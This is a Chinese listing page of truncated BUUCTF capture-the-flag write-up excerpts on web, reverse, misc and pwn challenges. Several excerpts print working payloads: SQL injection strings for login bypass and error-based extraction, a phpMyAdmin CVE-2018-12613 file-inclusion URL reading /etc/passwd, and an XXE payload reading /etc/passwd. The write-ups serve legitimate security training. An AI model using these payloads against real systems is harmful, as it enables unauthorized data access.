首页 > TAG信息列表 > buuctf
buuctf
注意,strcat拼接时,是以小端序方式拼接的,0x……LL中的LL指的是long long类型,从右到左读字符。 from binascii import a2b_heximport gmpy2t1 = '4E44434C53'key = 'ADSFK' + a2b_hex(t1).decode()v5=len(key)v3=0keyt=""for i in range(v5): if ord(key[v3 % v5]) > 64buuctf | [极客大挑战 2019]HardSQL
时间:August 8 2022 经过测试发现 闭合用单引号 过滤了空格等字符和sql关键词,用%20、%0a、/**/来绕过都不行 fuzzing一下,看有哪些关键词和字符被过滤了: import requests with open('Sql.txt') as f: for line in f: line = line.replace('\n','') url = f'hBUUCTF-[RCTF2015]EasySQL
1、进去后是个登陆框,可以注册用户。首先这种猜测是二次注入,注册了admin’#用户,进去后有个改密码的操作,更加坚信了是个二次注入,但是并没有起到效果。 2、因为并不清楚sql语句的闭合方式,所以重新注册一个admin"#,登陆后也没有起到作用。 3、注册admin\,登陆进去后修改密码,结果出BUUCTF:[MRCTF2020]不眠之夜
题目 安装 linux下拼图工具gaps安装教程 - 简书 (jianshu.com) apt-get install graphicsmagick-imagemagick-compat 解题代码 注意要删掉一张没用的损坏图片 montage *.jpg -tile 10x12 -resize 1000x600 -geometry +0+0 out.jpg #把图片碎片合成一个图片 gaps --image=oubuuctf*[PHPMYADMIN]CVE-2018-12613 1
http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 在sql里面执行 SELECT '<?=phpinfo()?>'; http://node4.buuoj.cn:26180/index.php?target=sql.php?/../../../../../../../../../tmp/sess_be13990e05aa89586898BUUCTF[极客大挑战 2019]HardSQL
1、burpsuit抓包,跑一下fuzz 发现长度为736的都被过滤掉了 2、观察error界面,猜测应该是报错注入 先爆数据库名 1 admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#、0x7e代表~ 得到数据库名geek 3、爆表名 1 admin'or(updatexml(1,concat(0x7e,(select(table_name)【BUUCTF】[极客大挑战 2019]LoveSQL
1、打开靶机,先尝试一下万能密码 1 admin'or 1=1# 2 1234 2、尝试爆字段 1 admin'order by 1# 2 admin'order by 2# 3 admin'order by 3# 4 admin'order by 4# 3、看回显位置 1 1' union select 1,2,3# 回显在二、三位置 4、爆数据库 1 1' union select 1,database(),ve[BUUCTF misc]SWPU2019 神奇的二维码
SWPU2019 神奇的二维码 下载下来是一个二维码,扫描是一个假的flag 用binwalk分析一下,得到四个压缩包,三个能解压,有一个需要密码,716A解压出来的压缩包也需要密码。 两个文档里都是base64编码的内容,感觉分别是两个压缩包的密码,试试,果然。 解压得到一个音频,是摩斯密码,解密,得到flagweb*buuctf*[PHP]XXE 1
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><root><name>&xxe;</name></root> payloadBUUCTF-web 【极客大挑战2019】EasySQL
打开环境: 根据题目提示:简单的sql,猜测需要sql注入,于是测试注入 随便输入用户名和密码,并进行简单的order by测试 联合注入: 成功拿到flag!BUUCTF---Reverse---reverse1
BUUCTF---Reverse---reverse1 flag:flag{hell0_w0rld} 解题步骤: 1、观察题目,下载附件 2、下载好后发现文件无法打开,提示报错,选择IDA打开,使用IDA64位打开 3、使用Shift+F12,打开字符串窗口,将所有字符串进行列出,发现存在flag字样的字符串 4、双击包含flag的字符串,查看详细位BUUCTF---Reverse---easyre
BUUCTF---Reverse---easyre flag:flag{this_Is_a_EaSyRe} 解题步骤: 1、观察题目,下载附件 2、根据题目描述,本道题难度应该不大,尝试打开,发现并没有信息或提示 3、按照习惯,使用IDA打开该文件,这里使用的是IDA7.5版本,不同版本有可能在逆向过程中会出现一些问题,需要注意一下,直接buuctf-ACTF2020新生赛-oruga(2)
buuctf-ACTF2020新生赛-oruga(2) 书接上文 一开始打算爆破它,不过好像有点难 于是重新回到题,首先它是一个迷宫题,因此我们要先找到的是起点 终点 方向 因此33是它的终点 //当v2这个下标走到33的时候 一切就结束了 其次我们 是用来判断是否超出的 符合这个循环只有左上角 再者如果起点BUUCTF:[GKCTF 2021]0.03
题目来源:https://buuoj.cn/challenges#[GKCTF%202021]0.03 secret.txt奇奇怪怪 压缩包名字叫flag_in_the_disk,那么把它挂载 被加密 ntfs隐写 三分密码 成功挂载 flag{85ec0e23-ebbe-4fa7-9c8c-e8b743d0d85c}BUUCTF:[BSidesSF2020]toast-clicker1
题目来源:https://buuoj.cn/challenges#[BSidesSF2020]toast-clicker1 说明.txt: A fun toast clicker game for your enjoyment. While you are at it, can you find the first flag? apk拖进jadx 共有22个数字,应该是ASCII码,前三个数字分别加0,1,2转换为字符是CTF 所以22个数BUUCTF:[HDCTF2019]你能发现什么蛛丝马迹吗
题目来源:https://buuoj.cn/challenges#[HDCTF2019]%E4%BD%A0%E8%83%BD%E5%8F%91%E7%8E%B0%E4%BB%80%E4%B9%88%E8%9B%9B%E4%B8%9D%E9%A9%AC%E8%BF%B9%E5%90%97 内存取证 题给了img文件 先看镜像信息 profile选Win2003SP0x86好像不对 应该是Win2003SP1x86 看一下cmd进程 Dumbuuctf-ACTF2020新生赛-oruga
buuctf-ACTF2020新生赛-oruga 太晚了,已经困了,过后再写脚本 本以为这是个常规(指排好顺序就能出的题) 没想到不仔细看还真难看出来 伪代码流程图 在能顺利通过前面几个条件判断条件下,再通过while(!unk_55A6FF765020),所以我一条条看下来发现每次只有当特定字符输入时,你才能够完成这两份BUUCTF:[安洵杯 2019]easy misc
题目来源:https://buuoj.cn/challenges#[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy%20misc 很早很早之前就写过这题,一直没做出来,我爷爷看到估计得高兴死 foremost分离+掩码+盲水印+词频统计 题给了三个文件 read文件夹 全是txt文件,里面是英文文章 文件夹末尾有一个hint 应该BUUCTF:[SUCTF2018]dead_z3r0
题目来源:https://buuoj.cn/challenges#[SUCTF2018]dead_z3r0 题给了一个无后缀的文件 属性看看没啥东西,010打开 看不出来啥文件 百度回来,别的师傅说是pyc 把前面那段base删除,将后缀改为pyc 剑龙隐写GitHub - AngelKitty/stegosaurus: A steganography tool for embeddBUUCTF:[INSHack2017]10-cl0v3rf13ld-lane-signal
题目来源:https://buuoj.cn/challenges#[INSHack2017]10-cl0v3rf13ld-lane-signal 题目给了后缀为unk的文件 010打开,文件头是jpg 改后缀再打开 没啥特别的 foremost得到png 右下角 手敲螺丝 .... . .-.. .--. -- . 不完整 回头BUUCTF-gundam
[BUUCTF] gundam 题目链接:https://buuoj.cn/challenges#hitb2018_gundam 这道题主要考察的是tcache的相关漏洞利用,由于刚接触堆漏洞利用,一步一坑...,做完后心生感慨必须得写点什么记录这次的踩坑经历。 glibc 环境配置 在做pwn相关题目时需要保持本地和远程机器环境一致。对于BUUCTF test_your_nc
安装pwntools 在已安装python和pip后,直接 pip install pwntools 使用checksec,检测文件的保护机制 checksec在下载好pwntools后就有 发现test文件为64位,部分开启RELRO,开启了NX防护和PIE RELRO(ReLocation Read-Only)堆栈地址随机化: RELRO会有Partial RELRO和FULLBUUCTF刷题-[ACTF2020 新生赛]BackupFile-1
[ACTF2020 新生赛]BackupFile-1 1、通过dirsearch进行扫描,在扫描结果中发现了index.php.bak文件,(经过了几次尝试,才确定是这个文件,因为扫描出来的结果比较多),扫描结果如下: 2、下载扫描的index.php.bak文件,查看文件信息,文件内容如下: 3、这里说明一下intval函BUUCTF 不一样的flag
利用PEiD打开不一样的flag.exe,无壳,32位 利用ida打开不一样的flag.exe,反编译得到代码 int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char v3[29]; // [esp+17h] [ebp-35h] BYREF int v4; // [esp+34h] [ebp-18h] int v5; // [esp+38BUUCTF reverse3
利用PEiD打开reverse_3.exe,无壳,32位 2.利用ida打开reverse_3.exe,反编译并找到主函数 int __cdecl main_0(int argc, const char **argv, const char **envp) { size_t v3; // eax const char *v4; // eax size_t v5; // eax char v7; // [esp+0h] [ebp-188h] char v8